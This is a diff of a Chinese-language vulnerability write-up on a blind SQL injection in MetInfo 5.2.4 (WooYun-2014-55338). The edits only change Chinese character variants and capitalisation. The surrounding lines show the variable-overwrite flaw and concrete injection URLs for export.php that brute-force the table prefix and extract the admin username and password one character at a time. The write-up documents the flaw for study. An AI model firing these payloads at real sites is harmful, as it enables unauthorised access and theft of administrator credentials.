--- a/論PHP常見的漏洞/3.7 WooYun-2014-55338：MetInfo最新版(5.2.4)一處SQL盲注漏洞.md
+++ b/論PHP常見的漏洞/3.7 WooYun-2014-55338：MetInfo最新版(5.2.4)一處SQL盲注漏洞.md
@@ -49,7 +49,7 @@ foreach(array('_COOKIE', '_POST', '_GET') as $_request) {
 //print '-----------------------------------<br>';
 ```
 
-註冊全局變量，可以看到所有的變量都經過了daddslashes()過濾
+註冊全局變數，可以看到所有的變數都經過了daddslashes()過濾
 
 ---
 
@@ -153,7 +153,7 @@ function daddslashes($string, $force = 0 ,$sql_injection =0,$url =0){
 }
 ```
 
-可以看到，是能夠傳遞array變量進來的（前台的include/include/global.func.php 不能）
+可以看到，是能夠傳遞array變數進來的（前台的include/include/global.func.php 不能）
 ---
 ### 3. 注入點admin/content/feedback/export.php
 <br />
@@ -186,7 +186,7 @@ foreach($settings_arr as $key=>$val){
 
         if($val['columnid']==$class1){
 
-            $tingname    =$val['name'].'_'.$val['columnid'];   //這裡導致變量名必須含有下劃線的都可以被覆蓋
+            $tingname    =$val['name'].'_'.$val['columnid'];   //這裡導致變數名必須含有下劃線的都可以被覆蓋
 
             $$val['name']=$$tingname;
 
@@ -195,13 +195,13 @@ foreach($settings_arr as $key=>$val){
     }
 ```
 
-其中,$settings_arr,$class1都可以在common.inc.php中被覆蓋，這就導致可以構造一定格式的變量（變量名必須要有下劃線）
+其中,$settings_arr,$class1都可以在common.inc.php中被覆蓋，這就導致可以構造一定格式的變數（變數名必須要有下劃線）
 那麼，如何利用，我們來找下面的sql語句，總共有三句，找第一句即可
 
 ```php
 $query = "SELECT * FROM $met_parameter where module=8 and lang='$lang' order by no_order"; 
 
-         //>>>>注意，$met_parameter是在$settings_arr後被初始化的，不能直接覆盖，但是可以结合上面的危险操作，进行覆盖<<<<
+         //>>>>注意，$met_parameter是在$settings_arr後被初始化的，不能直接覆蓋，但是可以結合上面的危險操作，進行覆蓋<<<<
 	
     //print $query.'<br>';
 
@@ -259,21 +259,21 @@ http://localhost/MetInfo/admin/content/feedback/export.php?met_parameter_1=met_a
 ![3](https://raw.githubusercontent.com/dyeat/PDF/master/%E8%AB%96PHP%E5%B8%B8%E8%A6%8B%E7%9A%84%E6%BC%8F%E6%B4%9E/images/3/3.7/3.7-3.png)
 
 
-### step1：暴力破解metinfo前綴
+### Step1：暴力破解metinfo前綴
 用brup進行破解，根據返回大小
 
 <pre>
 http://localhost/MetInfo/admin/content/feedback/export.php?met_parameter_1=met_admin_table -- ;&class1=1&settings_arr[0][columnid]=1&settings_arr[0][name]=met_parameter
 </pre>
 
-### step2： 破解admin帳戶
+### Step2： 破解admin帳戶
 還是使用brup，用substr 一個個來
 
 <pre>
 http://localhost/MetInfo/admin/content/feedback/export.php?met_parameter_1=met_admin_table where substr(admin_id,1,1)=0x61 -- ;&class1=1&settings_arr[0][columnid]=1&settings_arr[0][name]=met_parameter
 </pre>
 
-### step3：破解admin密碼
+### Step3：破解admin密碼
 
 同上
 
